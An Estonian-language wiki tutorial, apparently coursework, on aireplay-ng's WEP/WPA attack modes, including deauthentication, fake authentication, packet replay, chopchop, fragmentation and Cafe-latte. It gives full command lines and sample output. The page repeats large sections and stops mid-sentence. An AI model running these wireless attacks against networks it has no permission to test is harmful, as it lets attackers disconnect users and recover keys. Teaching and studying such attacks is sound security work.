Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre>$ sudo aireplay-ng -4 -h CC:CC:CC:CC:CC:CC -b AA:AA:AA:AA:AA:AA ath0
Read 165 packets...

Size: 86, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F

Use this packet ? y

Saving chosen packet in replay_src-0001-123456.cap

Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms
Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms
Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms
Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms
Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms
...
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0001-123457.cap
Saving keystream in replay_dec-0001-123456.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugemiseks paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
$ sudo aireplay-ng -5 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Waiting for a data packet...
Read 96 packets...

Size: 120, FromDS: 1, ToDS: 0 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = CC:CC:CC:CC:CC:CC
Source MAC = BB:BB:BB:BB:BB:BB

0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 .B..........l~@.
0x0010: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.
0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.
0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....
0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..
0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q.D...w.....<R.
0x0070: 0505 933f af2f 740e ...?./t.

Use this packet ? y
Saving chosen packet in replay_src-0001-123456.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0001-123456.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T19:21:07Z

Tliiv: /* Teooria */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>$ sudo aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
...
</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

<pre>
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
Saving ARP requests in replay_arp-0001-123456.cap
You should also start airodump-ng to capture replies.
Read 11978 packets (got 7193 ARP requests), sent 3902 packets...
</pre>

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 